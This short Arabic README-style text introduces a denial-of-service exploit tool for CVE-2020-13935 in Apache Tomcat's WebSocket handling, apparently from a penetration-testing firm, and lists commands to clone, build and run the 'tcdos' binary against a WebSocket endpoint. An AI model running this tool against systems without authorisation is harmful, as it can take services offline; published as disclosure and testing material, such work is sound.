
استغلال ثغرة WebSocket في Apache Tomcat
في منشور المدونة المقابل، يتم شرح تحليل واستغلال الثغرة بالتفصيل.
استنسخ المستودع، ثم قم ببناء الملف الثنائي tcdos. قم بتشغيل البرنامج كما يلي لاختبار ما إذا كانت نقطة نهاية WebSocket معينة ضعيفة:
$ git clone https://github.com/RedTeamPentesting/CVE-2020-13935
$ cd CVE-2020-13935
$ go build
$ ./tcdos [WebSocket endpoint]